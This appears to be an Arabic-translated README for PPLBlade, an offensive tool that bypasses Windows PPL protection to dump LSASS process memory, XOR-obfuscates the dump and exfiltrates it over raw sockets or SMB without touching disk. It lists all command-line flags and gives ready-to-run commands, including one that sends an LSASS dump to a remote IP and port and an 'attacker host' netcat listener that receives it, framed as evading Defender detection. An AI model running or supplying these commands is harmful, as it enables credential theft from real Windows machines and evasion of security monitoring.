
يتجاوز حماية PPL لتفريغ ذاكرة عملية LSASS، ويُعمّي ملفات التفريغ باستخدام XOR، ويُسرّبها عن بُعد عبر RAW أو SMB دون الكتابة على القرص.
أداة تفريغ العمليات المحمية تدعم إخفاء تفريغ الذاكرة ونقله إلى محطات العمل البعيدة دون إسقاطه على القرص.
الوظائف الرئيسية:
نظرة عامة على التقنيات المستخدمة في هذه الأداة يمكن العثور عليها هنا: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
لاحظ أن PROCEXP15.SYS مدرج في ملفات المصدر لأغراض التجميع. لا يحتاج إلى نقله إلى الجهاز المستهدف بجانب PPLBlade.exe.
إنه مضمن بالفعل في PPLBlade.exe. الاستغلال هو مجرد ملف تنفيذي واحد.
الأوضاع:
أوضاع المقبض:
Usage of PPLBlade.exe:
-driver string
Path where the driver file will be dropped (default: current directory)
-dumpmode string
Dump mode [local|network] (default "local")
-dumpname string
Name of the dump file (default "PPLBlade.dmp")
-handle string
Method to obtain target process handle [direct|procexp] (default "direct")
-help
Prints this help message
-ip string
IP of the remote server
-key string
XOR Key for obfuscation (default "PPLBlade")
-mode string
Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
-name string
Process name of target process
-network string
Method for network transfer[raw|smb] (default "raw")
-obfuscate
Obfuscate dump file
-pass string
SMB password
-pid int
PID of target process (prioritized over process name)
-port int
PORT on the remote server
-quiet
Quiet mode
-service string
Name of the service (default "PPLBlade")
-share string
share name
-user string
SMB username
Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup
أمثلة:
إثبات مفهوم أساسي يستخدم PROCEXP152.sys لتفريغ lsass:
PPLBlade.exe --mode dothatlsassthing
(لاحظ أنه لا يقوم بعملية XOR على ملف التفريغ، قم بتوفير علامة obfuscate إضافية لتمكين وظيفة XOR)
رفع تفريغ LSASS المخفي إلى موقع بعيد:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
المضيف المهاجم:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
إزالة إخفاء تفريغ الذاكرة:
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade